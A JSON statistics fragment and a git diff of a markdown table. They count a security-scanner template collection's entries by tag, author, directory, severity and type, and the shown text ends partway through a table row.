},{"name":"graphite","count":1},{"name":"eyou","count":1},{"name":"couchbase","count":1},{"name":"javamelody","count":1},{"name":"nomad","count":1},{"name":"default","count":1},{"name":"eg","count":1},{"name":"basic-auth","count":1},{"name":"gespage","count":1},{"name":"smartblog","count":1},{"name":"tjws","count":1},{"name":"episerver","count":1},{"name":"mongoshake","count":1},{"name":"concrete","count":1},{"name":"qdpm","count":1},{"name":"iceflow","count":1},{"name":"ecom","count":1},{"name":"nweb2fax","count":1},{"name":"mdb","count":1},{"name":"openemr","count":1},{"name":"lotuscms","count":1},{"name":"maccmsv10","count":1},{"name":"ambari","count":1},{"name":"htmli","count":1},{"name":"nps","count":1},{"name":"parentlink","count":1},{"name":"wooyun","count":1},{"name":"sureline","count":1},{"name":"xampp","count":1},{"name":"wavlink","count":1},{"name":"mantisbt","count":1},{"name":"nuxeo","count":1},{"name":"gilacms","count":1},{"name":"sco","count":1},{"name":"shoretel","count":1},{"name":"csrf","count":1},{"name":"landrayoa","count":1},{"name":"blackboard","count":1},{"name":"totaljs","count":1},{"name":"linksys","count":1},{"name":"adb","count":1},{"name":"fastapi","count":1},{"name":"apiman","count":1},{"name":"tectuus","count":1},{"name":"phpfusion","count":1},{"name":"myvuehelp","count":1},{"name":"natemail","count":1},{"name":"shopizer","count":1},{"name":"tpshop","count":1},{"name":"openrestry","count":1},{"name":"magicflow","count":1},{"name":"bitly","count":1},{"name":"postmessage","count":1},{"name":"diris","count":1},{"name":"spidercontrol","count":1},{"name":"mediumish","count":1},{"name":"zcms","count":1},{"name":"cve2006","count":1},{"name":"ueditor","count":1},{"name":"circontrol","count":1},{"name":"websvn","count":1},{"name":"labtech","count":1},{"name":"stem","count":1},{"name":"redwood","count":1},{"name":"tensorboard","count":1},{"name":"livezilla","count":1},{"name":"pippoint","count":1},{"name":"ns","count":1},{"name":"terraform","count":1},{"name":"primetek","count":1},{"name":"hadoop","count":1},{"name":"rmi","count":1},{"name":"netdata","count":1},{"name":"alibaba","count":1},{"name":"wavemaker","count":1},{"name":"jmx","count":1},{"name":"monitorix","count":1},{"name":"vscode","count":1},{"name":"uwsgi","count":1},{"name":"zend","count":1},{"name":"actuator","count":1},{"name":"dvwa","count":1},{"name":"perl","count":1},{"name":"finereport","count":1},{"name":"clusterengine","count":1},{"name":"discourse","count":1},{"name":"rocketchat","count":1},{"name":"zm","count":1},{"name":"tongda","count":1},{"name":"alertmanager","count":1},{"name":"svn","count":1},{"name":"comodo","count":1},{"name":"svnserve","count":1},{"name":"logontracer","count":1},{"name":"pmb","count":1},{"name":"ganglia","count":1},{"name":"synnefo","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":258},{"name":"daffainfo","count":213},{"name":"pdteam","count":196},{"name":"geeknik","count":152},{"name":"dwisiswant0","count":131},{"name":"gy741","count":72},{"name":"pussycat0x","count":65},{"name":"madrobot","count":61},{"name":"princechaddha","count":61},{"name":"gaurang","count":42},{"name":"0x_akoko","count":37},{"name":"ice3man","count":26},{"name":"philippedelteil","count":25},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":10},{"name":"righettod","count":10},{"name":"melbadry9","count":9},{"name":"nadino","count":9},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"dogasantos","count":7},{"name":"meme-lord","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"dr_set","count":7},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"elsfa7110","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"iamnoooob","count":5},{"name":"xelkomy","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"lu4nx","count":4},{"name":"nodauf","count":4},{"name":"skeltavik","count":3},{"name":"z3bd","count":3},{"name":"tess","count":3},{"name":"_generic_human_","count":3},{"name":"emenalf","count":3},{"name":"unstabl3","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"johnk3r","count":3},{"name":"sushantkamble","count":3},{"name":"mavericknerd","count":3},{"name":"shine","count":3},{"name":"f1tz","count":3},{"name":"jarijaas","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"0w4ys","count":3},{"name":"idealphase","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"vsh00t","count":3},{"name":"dudez","count":3},{"name":"fyoorer","count":3},{"name":"random-robbie","count":2},{"name":"0xelkomy","count":2},{"name":"convisoappsec","count":2},{"name":"alifathi-h1","count":2},{"name":"x1m_martijn","count":2},{"name":"johnjhacking","count":2},{"name":"0xrudra","count":2},{"name":"bp0lr","count":2},{"name":"0xsapra","count":2},{"name":"kiblyn11","count":2},{"name":"0xsmiley","count":2},{"name":"0xprial","count":2},{"name":"ree4pwn","count":2},{"name":"parth","count":2},{"name":"amsda","count":2},{"name":"arcc","count":2},{"name":"zomsop82","count":2},{"name":"lotusdll","count":2},{"name":"nkxxkn","count":2},{"name":"udit_thakkur","count":2},{"name":"huowuzhao","count":2},{"name":"0xcrypto","count":2},{"name":"gevakun","count":2},{"name":"afaq","count":2},{"name":"r3naissance","count":2},{"name":"bernardofsr","count":2},{"name":"joeldeleep","count":2},{"name":"cocxanh","count":2},{"name":"vavkamil","count":2},{"name":"gal nagli","count":2},{"name":"w4cky_","count":2},{"name":"manas_harsh","count":2},{"name":"pxmme1337","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"g4l1t0","count":2},{"name":"ehsahil","count":2},{"name":"socketz","count":2},{"name":"swissky","count":2},{"name":"hahwul","count":2},{"name":"koti2","count":2},{"name":"foulenzer","count":2},{"name":"davidmckennirey","count":2},{"name":"randomrobbie","count":2},{"name":"mohammedsaneem","count":2},{"name":"whoever","count":2},{"name":"moritz nentwig","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"bing0o","count":2},{"name":"hetroublemakr","count":2},{"name":"fabaff","count":2},{"name":"manuelbua","count":1},{"name":"thezakman","count":1},{"name":"zhenwarx","count":1},{"name":"th3.d1p4k","count":1},{"name":"adrianmf","count":1},{"name":"taielab","count":1},{"name":"chron0x","count":1},{"name":"_harleo","count":1},{"name":"flag007","count":1},{"name":"pudsec","count":1},{"name":"intx0x80","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"mass0ma","count":1},{"name":"sullo","count":1},{"name":"tim_koopmans","count":1},{"name":"schniggie","count":1},{"name":"regala_","count":1},{"name":"andirrahmani1","count":1},{"name":"j33n1k4","count":1},{"name":"deena","count":1},{"name":"jteles","count":1},{"name":"akshansh","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"kurohost","count":1},{"name":"geraldino2","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"c3l3si4n","count":1},{"name":"wabafet","count":1},{"name":"yashgoti","count":1},{"name":"ringo","count":1},{"name":"pratik khalane","count":1},{"name":"ahmetpergamum","count":1},{"name":"naglinagli","count":1},{"name":"becivells","count":1},{"name":"its0x08","count":1},{"name":"tirtha_mandal","count":1},{"name":"rodnt","count":1},{"name":"nytr0gen","count":1},{"name":"raesene","count":1},{"name":"vzamanillo","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"brabbit10","count":1},{"name":"@dwisiswant0","count":1},{"name":"mubassirpatel","count":1},{"name":"kareemse1im","count":1},{"name":"dawid-czarnecki","count":1},{"name":"udyz","count":1},{"name":"undefl0w","count":1},{"name":"alperenkesk","count":1},{"name":"b0rn2r00t","count":1},{"name":"notsoevilweasel","count":1},{"name":"jeya seelan","count":1},{"name":"0ut0fb4nd","count":1},{"name":"mhdsamx","count":1},{"name":"yashanand155","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"0xtavian","count":1},{"name":"bolli95","count":1},{"name":"elder tao","count":1},{"name":"retr0","count":1},{"name":"revblock","count":1},{"name":"streetofhackerr007","count":1},{"name":"b4uh0lz","count":1},{"name":"ajaysenr","count":1},{"name":"b0yd","count":1},{"name":"iampritam","count":1},{"name":"remonsec","count":1},{"name":"0h1in9e","count":1},{"name":"defr0ggy","count":1},{"name":"0xrod","count":1},{"name":"sec_hawk","count":1},{"name":"bjhulst","count":1},{"name":"kabirsuda","count":1},{"name":"whynotke","count":1},{"name":"divya_mudgal","count":1},{"name":"soyelmago","count":1},{"name":"shreyapohekar","count":1},{"name":"daviey","count":1},{"name":"alex","count":1},{"name":"_c0wb0y_","count":1},{"name":"rojanrijal","count":1},{"name":"ilovebinbash","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"petruknisme","count":1},{"name":"affix","count":1},{"name":"qlkwej","count":1},{"name":"luskabol","count":1},{"name":"luci","count":1},{"name":"sy3omda","count":1},{"name":"infosecsanyam","count":1},{"name":"furkansenan","count":1},{"name":"_darrenmartyn","count":1},{"name":"makyotox","count":1},{"name":"exploitation","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"toufik airane","count":1},{"name":"d0rkerdevil","count":1},{"name":"push4d","count":1},{"name":"alph4byt3","count":1},{"name":"micha3lb3n","count":1},{"name":"bad5ect0r","count":1},{"name":"borna nematzadeh","count":1},{"name":"absshax","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"willd96","count":1},{"name":"ohlinge","count":1},{"name":"ldionmarcil","count":1},{"name":"elmahdi","count":1},{"name":"juicypotato1","count":1},{"name":"0xteles","count":1},{"name":"ahmed sherif","count":1},{"name":"berkdusunur","count":1},{"name":"patralos","count":1},{"name":"s1r1u5_","count":1},{"name":"sickwell","count":1},{"name":"aresx","count":1},{"name":"philippdelteil","count":1},{"name":"un-fmunozs","count":1},{"name":"mesaglio","count":1},{"name":"yavolo","count":1},{"name":"thevillagehacker","count":1},{"name":"xstp","count":1},{"name":"cookiehanhoan","count":1},{"name":"kre80r","count":1},{"name":"me9187","count":1},{"name":"co0nan","count":1},{"name":"hanlaomo","count":1},{"name":"nerrorsec","count":1},{"name":"akash.c","count":1},{"name":"sicksec","count":1},{"name":"knassar702","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"zandros0","count":1},{"name":"smaranchand","count":1},{"name":"apt-mirror","count":1},{"name":"ipanda","count":1},{"name":"izn0u","count":1},{"name":"andysvints","count":1},{"name":"ooooooo_q","count":1},{"name":"rotemreiss","count":1},{"name":"shelld3v","count":1},{"name":"noamrathaus","count":1},{"name":"fmunozs","count":1},{"name":"omarkurt","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"evolutionsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"gboddin","count":1},{"name":"hakluke","count":1},{"name":"fopina","count":1},{"name":"pdp","count":1},{"name":"shifacyclewla","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"x6263","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"mah3sec_","count":1},{"name":"sshell","count":1},{"name":"52971","count":1},{"name":"blckraven","count":1}],"directory":[{"name":"cves","count":724},{"name":"vulnerabilities","count":299},{"name":"exposed-panels","count":248},{"name":"technologies","count":190},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":642},{"name":"high","count":552},{"name":"medium","count":449},{"name":"critical","count":271},{"name":"low","count":152}],"types":[{"name":"http","count":1962},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index b752fd5e41..c038731d21 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,807 +1,815 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 702 | pikpikcu | 267 | cves | 715 | info | 630 | http | 1930 | -| lfi | 253 | dhiyaneshdk | 253 | vulnerabilities | 291 | high | 546 | file | 46 | -| panel | 248 | daffainfo | 206 | exposed-panels | 248 | medium | 441 | network | 41 | -| xss | 240 | pdteam | 195 | exposures | 187 | critical | 269 | dns | 12 | -| exposure | 228 | geeknik | 151 | technologies | 182 | low | 148 | | | -| wordpress | 212 | dwisiswant0 | 132 | misconfiguration | 132 | | | | | -| rce | 197 | gy741 | 72 | takeovers | 63 | | | | | -| tech | 173 | madrobot | 62 | default-logins | 56 | | | | | -| cve2020 | 162 | princechaddha | 61 | file | 46 | | | | | -| wp-plugin | 143 | pussycat0x | 58 | workflows | 36 | | | | | -| cve2021 | 123 | gaurang | 42 | network | 32 | | | | | -| cve2019 | 95 | 0x_akoko | 33 | miscellaneous | 24 | | | | | -| config | 93 | ice3man | 26 | iot | 23 | | | | | -| cve2018 | 83 | philippedelteil | 25 | dns | 12 | | | | | -| joomla | 77 | organiccrap | 24 | fuzzing | 9 | | | | | -| apache | 69 | sheikhrishad | 15 | cnvd | 9 | | | | | -| takeover | 67 | milo2012 | 14 | headless | 5 | | | | | -| cve2010 | 67 | pr3r00t | 13 | | | | | | | +| cve | 719 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | +| lfi | 258 | dhiyaneshdk | 258 | vulnerabilities | 299 | high | 552 | file | 46 | +| panel | 248 | daffainfo | 213 | exposed-panels | 248 | medium | 449 | network | 41 | +| xss | 244 | pdteam | 196 | technologies | 190 | critical | 271 | dns | 12 | +| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | +| wordpress | 222 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 198 | gy741 | 72 | takeovers | 64 | | | | | +| tech | 181 | pussycat0x | 65 | default-logins | 56 | | | | | +| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | +| wp-plugin | 149 | madrobot | 61 | workflows | 36 | | | | | +| cve2021 | 126 | gaurang | 42 | network | 32 | | | | | +| cve2019 | 95 | 0x_akoko | 37 | miscellaneous | 24 | | | | | +| config | 94 | ice3man | 26 | iot | 23 | | | | | +| cve2018 | 82 | philippedelteil | 25 | dns | 12 | | | | | +| joomla | 79 | organiccrap | 24 | fuzzing | 10 | | | | | +| apache | 70 | sheikhrishad | 15 | cnvd | 9 | | | | | +| cve2010 | 69 | milo2012 | 14 | headless | 5 | | | | | +| takeover | 68 | pr3r00t | 13 | | | | | | | | token | 65 | techbrunchfr | 13 | | | | | | | | default-login | 63 | suman_kar | 12 | | | | | | | -| iot | 62 | r3dg33k | 11 | | | | | | | -| oob | 52 | cyllective | 11 | | | | | | | -| cve2017 | 49 | righettod | 10 | | | | | | | -| file | 46 | wdahlenb | 10 | | | | | | | -| unauth | 45 | random_robbie | 10 | | | | | | | -| network | 41 | nadino | 9 | | | | | | | -| sqli | 38 | melbadry9 | 9 | | | | | | | -| oracle | 36 | hackergautam | 9 | | | | | | | -| ssrf | 36 | that_juan_ | 8 | | | | | | | -| | 36 | aashiq | 8 | | | | | | | -| cve2016 | 34 | iamthefrogy | 8 | | | | | | | -| redirect | 30 | emadshanab | 7 | | | | | | | -| logs | 30 | harshbothra_ | 7 | | | | | | | -| jira | 28 | dogasantos | 7 | | | | | | | -| atlassian | 27 | dr_set | 7 | | | | | | | -| listing | 25 | kophjager007 | 7 | | | | | | | -| misc | 23 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 21 | techryptic (@tech) | 7 | | | | | | | -| disclosure | 21 | randomstr1ng | 7 | | | | | | | +| iot | 62 | cyllective | 11 | | | | | | | +| oob | 53 | r3dg33k | 11 | | | | | | | +| cve2017 | 49 | random_robbie | 10 | | | | | | | +| file | 46 | righettod | 10 | | | | | | | +| unauth | 46 | wdahlenb | 10 | | | | | | | +| network | 41 | hackergautam | 9 | | | | | | | +| sqli | 38 | nadino | 9 | | | | | | | +| ssrf | 37 | melbadry9 | 9 | | | | | | | +| oracle | 36 | that_juan_ | 8 | | | | | | | +| | 36 | iamthefrogy | 8 | | | | | | | +| cve2016 | 36 | aashiq | 8 | | | | | | | +| redirect | 33 | dr_set | 7 | | | | | | | +| logs | 30 | techryptic (@tech) | 7 | | | | | | | +| jira | 28 | 0x240x23elu | 7 | | | | | | | +| atlassian | 27 | dogasantos | 7 | | | | | | | +| listing | 27 | randomstr1ng | 7 | | | | | | | +| cve2015 | 23 | kophjager007 | 7 | | | | | | | +| misc | 23 | meme-lord | 7 | | | | | | | +| disclosure | 21 | emadshanab | 7 | | | | | | | +| generic | 20 | harshbothra_ | 7 | | | | | | | | auth-bypass | 20 | oppsec | 7 | | | | | | | -| generic | 20 | caspergn | 6 | | | | | | | -| router | 19 | __fazal | 6 | | | | | | | -| aem | 19 | puzzlepeaches | 6 | | | | | | | -| cisco | 19 | logicalhunter | 6 | | | | | | | -| springboot | 18 | meme-lord | 6 | | | | | | | -| sap | 18 | elsfa7110 | 5 | | | | | | | -| debug | 17 | ganofins | 5 | | | | | | | -| cve2014 | 16 | pentest_swissky | 5 | | | | | | | -| misconfig | 15 | joanbono | 5 | | | | | | | -| weblogic | 14 | rootxharsh | 5 | | | | | | | -| struts | 14 | panch0r3d | 5 | | | | | | | -| cve2011 | 14 | iamnoooob | 5 | | | | | | | -| login | 14 | yanyun | 5 | | | | | | | -| php | 14 | lu4nx | 4 | | | | | | | -| cve2012 | 14 | github.com/its0x08 | 4 | | | | | | | -| dns | 13 | e_schultze_ | 4 | | | | | | | -| devops | 13 | nodauf | 4 | | | | | | | -| fuzz | 13 | xelkomy | 4 | | | | | | | -| zoho | 13 | tess | 3 | | | | | | | -| android | 13 | 0w4ys | 3 | | | | | | | -| adobe | 13 | johnk3r | 3 | | | | | | | -| jenkins | 12 | shine | 3 | | | | | | | -| dlink | 12 | yash anand @yashanand155 | 3 | | | | | | | -| cve2013 | 11 | fyoorer | 3 | | | | | | | -| aws | 11 | z3bd | 3 | | | | | | | -| dell | 10 | idealphase | 3 | | | | | | | -| xxe | 9 | vsh00t | 3 | | | | | | | -| magento | 9 | incogbyte | 3 | | | | | | | -| ftp | 9 | mavericknerd | 3 | | | | | | | -| gitlab | 8 | _generic_human_ | 3 | | | | | | | -| nginx | 8 | jarijaas | 3 | | | | | | | -| rails | 8 | thomas_from_offensity | 3 | | | | | | | -| cnvd | 8 | impramodsargar | 3 | | | | | | | -| ruijie | 8 | dudez | 3 | | | | | | | -| intrusive | 8 | emenalf | 3 | | | | | | | -| airflow | 8 | shifacyclewala | 3 | | | | | | | -| scada | 8 | binaryfigments | 3 | | | | | | | -| kubernetes | 7 | skeltavik | 3 | | | | | | | -| cve2009 | 7 | f1tz | 3 | | | | | | | -| ibm | 7 | gal nagli | 2 | | | | | | | -| google | 7 | bing0o | 2 | | | | | | | -| files | 7 | pxmme1337 | 2 | | | | | | | -| vmware | 7 | fabaff | 2 | | | | | | | -| coldfusion | 7 | manas_harsh | 2 | | | | | | | -| netgear | 7 | ehsahil | 2 | | | | | | | -| wp-theme | 7 | cocxanh | 2 | | | | | | | -| cms | 7 | parth | 2 | | | | | | | -| microsoft | 7 | 0xcrypto | 2 | | | | | | | -| backup | 7 | nkxxkn | 2 | | | | | | | -| confluence | 7 | joeldeleep | 2 | | | | | | | -| cves | 7 | convisoappsec | 2 | | | | | | | -| rconfig | 6 | moritz nentwig | 2 | | | | | | | -| django | 6 | alifathi-h1 | 2 | | | | | | | -| api | 6 | x1m_martijn | 2 | | | | | | | -| laravel | 6 | random-robbie | 2 | | | | | | | -| cve2008 | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| docker | 6 | 0xsapra | 2 | | | | | | | -| solr | 6 | foulenzer | 2 | | | | | | | -| jetty | 6 | mohammedsaneem | 2 | | | | | | | -| citrix | 6 | amsda | 2 | | | | | | | -| drupal | 5 | 0xrudra | 2 | | | | | | | -| lucee | 5 | hahwul | 2 | | | | | | | -| java | 5 | kiblyn11 | 2 | | | | | | | -| printer | 5 | dheerajmadhukar | 2 | | | | | | | -| dedecms | 5 | bp0lr | 2 | | | | | | | -| iis | 5 | udit_thakkur | 2 | | | | | | | -| windows | 5 | g4l1t0 | 2 | | | | | | | -| headless | 5 | randomrobbie | 2 | | | | | | | -| deserialization | 5 | lotusdll | 2 | | | | | | | -| phpmyadmin | 5 | 0xelkomy | 2 | | | | | | | -| tomcat | 5 | w4cky_ | 2 | | | | | | | -| circarlife | 5 | 0xprial | 2 | | | | | | | -| fileupload | 5 | socketz | 2 | | | | | | | -| jolokia | 5 | davidmckennirey | 2 | | | | | | | -| ssti | 5 | whoever | 2 | | | | | | | -| nodejs | 5 | bsysop | 2 | | | | | | | -| symantec | 4 | huowuzhao | 2 | | | | | | | -| hp | 4 | arcc | 2 | | | | | | | -| webserver | 4 | zomsop82 | 2 | | | | | | | -| magmi | 4 | unstabl3 | 2 | | | | | | | -| grafana | 4 | ree4pwn | 2 | | | | | | | -| hongdian | 4 | swissky | 2 | | | | | | | -| symfony | 4 | koti2 | 2 | | | | | | | -| firmware | 4 | johnjhacking | 2 | | | | | | | -| wso2 | 4 | hetroublemakr | 2 | | | | | | | -| proxy | 4 | afaq | 2 | | | | | | | -| zimbra | 4 | r3naissance | 2 | | | | | | | -| samsung | 4 | sushantkamble | 2 | | | | | | | -| glpi | 4 | vavkamil | 2 | | | | | | | -| traversal | 4 | gevakun | 2 | | | | | | | -| vpn | 4 | aresx | 1 | | | | | | | -| thinkphp | 4 | shifacyclewla | 1 | | | | | | | -| resin | 4 | intx0x80 | 1 | | | | | | | -| asp | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| crlf | 4 | yashanand155 | 1 | | | | | | | -| solarwinds | 4 | _darrenmartyn | 1 | | | | | | | -| moodle | 4 | ajaysenr | 1 | | | | | | | -| artifactory | 4 | notsoevilweasel | 1 | | | | | | | -| elastic | 4 | 0xtavian | 1 | | | | | | | -| strapi | 4 | smaranchand | 1 | | | | | | | -| buffalo | 4 | fmunozs | 1 | | | | | | | -| thinkcmf | 4 | ilovebinbash | 1 | | | | | | | -| exchange | 4 | willd96 | 1 | | | | | | | -| linkerd | 3 | udyz | 1 | | | | | | | -| openssh | 3 | berkdusunur | 1 | | | | | | | -| log | 3 | thezakman | 1 | | | | | | | -| firebase | 3 | alex | 1 | | | | | | | -| caucho | 3 | rojanrijal | 1 | | | | | | | -| fpd | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| bypass | 3 | sickwell | 1 | | | | | | | -| opensis | 3 | defr0ggy | 1 | | | | | | | -| fanruan | 3 | yavolo | 1 | | | | | | | -| openam | 3 | schniggie | 1 | | | | | | | -| tikiwiki | 3 | alph4byt3 | 1 | | | | | | | -| camera | 3 | jteles | 1 | | | | | | | -| mongodb | 3 | mubassirpatel | 1 | | | | | | | -| microstrategy | 3 | geraldino2 | 1 | | | | | | | -| httpd | 3 | zhenwarx | 1 | | | | | | | -| slack | 3 | ldionmarcil | 1 | | | | | | | -| itop | 3 | kba@sogeti_esec | 1 | | | | | | | -| ofbiz | 3 | wabafet | 1 | | | | | | | -| zabbix | 3 | 0h1in9e | 1 | | | | | | | -| nexus | 3 | infosecsanyam | 1 | | | | | | | -| bitrix | 3 | exploitation | 1 | | | | | | | -| druid | 3 | omarkurt | 1 | | | | | | | -| amazon | 3 | un-fmunozs | 1 | | | | | | | -| vbulletin | 3 | akshansh | 1 | | | | | | | -| targa | 3 | nytr0gen | 1 | | | | | | | -| springcloud | 3 | remonsec | 1 | | | | | | | -| npm | 3 | deena | 1 | | | | | | | -| kafka | 3 | streetofhackerr007 | 1 | | | | | | | -| bigip | 3 | furkansenan | 1 | | | | | | | -| injection | 3 | affix | 1 | | | | | | | -| ssh | 3 | cookiehanhoan | 1 | | | | | | | -| backups | 3 | mhdsamx | 1 | | | | | | | -| ebs | 3 | soyelmago | 1 | | | | | | | -| cacti | 3 | ipanda | 1 | | | | | | | -| oa | 3 | push4d | 1 | | | | | | | -| lfr | 3 | fopina | 1 | | | | | | | -| git | 3 | ringo | 1 | | | | | | | -| nacos | 3 | flag007 | 1 | | | | | | | -| zhiyuan | 3 | micha3lb3n | 1 | | | | | | | -| jellyfin | 3 | apt-mirror | 1 | | | | | | | -| kibana | 3 | alperenkesk | 1 | | | | | | | -| kevinlab | 3 | _c0wb0y_ | 1 | | | | | | | -| hoteldruid | 3 | xstp | 1 | | | | | | | -| terramaster | 3 | its0x08 | 1 | | | | | | | -| mail | 3 | juicypotato1 | 1 | | | | | | | -| r-seenet | 3 | chron0x | 1 | | | | | | | -| smtp | 3 | b0yd | 1 | | | | | | | -| telerik | 3 | yashgoti | 1 | | | | | | | -| nosqli | 3 | makyotox | 1 | | | | | | | -| prometheus | 3 | naglinagli | 1 | | | | | | | -| hasura | 2 | retr0 | 1 | | | | | | | -| kong | 2 | sicksec | 1 | | | | | | | -| openfire | 2 | hakluke | 1 | | | | | | | -| oauth | 2 | pudsec | 1 | | | | | | | -| axis2 | 2 | izn0u | 1 | | | | | | | -| smb | 2 | zandros0 | 1 | | | | | | | -| geowebserver | 2 | luskabol | 1 | | | | | | | -| splunk | 2 | petruknisme | 1 | | | | | | | -| azure | 2 | luci | 1 | | | | | | | -| aruba | 2 | b4uh0lz | 1 | | | | | | | -| yapi | 2 | andirrahmani1 | 1 | | | | | | | -| shellshock | 2 | hanlaomo | 1 | | | | | | | -| chiyu | 2 | shelld3v | 1 | | | | | | | -| yii | 2 | c3l3si4n | 1 | | | | | | | -| akamai | 2 | manuelbua | 1 | | | | | | | -| sharepoint | 2 | b0rn2r00t | 1 | | | | | | | -| saltstack | 2 | qlkwej | 1 | | | | | | | -| emerge | 2 | kre80r | 1 | | | | | | | -| qcubed | 2 | d0rkerdevil | 1 | | | | | | | -| avantfax | 2 | bernardofsr | 1 | | | | | | | -| globalprotect | 2 | elmahdi | 1 | | | | | | | -| voipmonitor | 2 | toufik airane | 1 | | | | | | | -| spark | 2 | me9187 | 1 | | | | | | | -| activemq | 2 | 0ut0fb4nd | 1 | | | | | | | -| prestashop | 2 | knassar702 | 1 | | | | | | | -| favicon | 2 | ahmetpergamum | 1 | | | | | | | -| nextjs | 2 | bernardo rodrigues | 1 | | | | | | | +| aem | 19 | pentest_swissky | 6 | | | | | | | +| cisco | 19 | caspergn | 6 | | | | | | | +| router | 19 | logicalhunter | 6 | | | | | | | +| debug | 18 | __fazal | 6 | | | | | | | +| misconfig | 18 | puzzlepeaches | 6 | | | | | | | +| springboot | 18 | iamnoooob | 5 | | | | | | | +| sap | 18 | yanyun | 5 | | | | | | | +| cve2014 | 18 | panch0r3d | 5 | | | | | | | +| php | 16 | elsfa7110 | 5 | | | | | | | +| weblogic | 14 | ganofins | 5 | | | | | | | +| cve2011 | 14 | rootxharsh | 5 | | | | | | | +| struts | 14 | joanbono | 5 | | | | | | | +| cve2012 | 14 | nodauf | 4 | | | | | | | +| fuzz | 14 | xelkomy | 4 | | | | | | | +| login | 14 | lu4nx | 4 | | | | | | | +| android | 13 | e_schultze_ | 4 | | | | | | | +| dns | 13 | github.com/its0x08 | 4 | | | | | | | +| adobe | 13 | yash anand @yashanand155 | 3 | | | | | | | +| zoho | 13 | emenalf | 3 | | | | | | | +| devops | 13 | fyoorer | 3 | | | | | | | +| jenkins | 12 | skeltavik | 3 | | | | | | | +| dlink | 12 | z3bd | 3 | | | | | | | +| aws | 12 | shifacyclewala | 3 | | | | | | | +| wp-theme | 11 | dudez | 3 | | | | | | | +| cve2013 | 11 | tess | 3 | | | | | | | +| dell | 10 | mavericknerd | 3 | | | | | | | +| xxe | 10 | impramodsargar | 3 | | | | | | | +| magento | 9 | johnk3r | 3 | | | | | | | +| ftp | 9 | binaryfigments | 3 | | | | | | | +| intrusive | 9 | unstabl3 | 3 | | | | | | | +| rails | 8 | f1tz | 3 | | | | | | | +| cnvd | 8 | jarijaas | 3 | | | | | | | +| nginx | 8 | 0w4ys | 3 | | | | | | | +| gitlab | 8 | sushantkamble | 3 | | | | | | | +| ruijie | 8 | thomas_from_offensity | 3 | | | | | | | +| scada | 8 | shine | 3 | | | | | | | +| airflow | 8 | _generic_human_ | 3 | | | | | | | +| cve2009 | 7 | idealphase | 3 | | | | | | | +| ibm | 7 | vsh00t | 3 | | | | | | | +| vmware | 7 | incogbyte | 3 | | | | | | | +| netgear | 7 | lotusdll | 2 | | | | | | | +| confluence | 7 | dheerajmadhukar | 2 | | | | | | | +| coldfusion | 7 | davidmckennirey | 2 | | | | | | | +| files | 7 | zomsop82 | 2 | | | | | | | +| microsoft | 7 | r3naissance | 2 | | | | | | | +| kubernetes | 7 | bp0lr | 2 | | | | | | | +| google | 7 | gal nagli | 2 | | | | | | | +| backup | 7 | socketz | 2 | | | | | | | +| cms | 7 | manas_harsh | 2 | | | | | | | +| rconfig | 6 | bsysop | 2 | | | | | | | +| solr | 6 | mohammedsaneem | 2 | | | | | | | +| laravel | 6 | 0xrudra | 2 | | | | | | | +| docker | 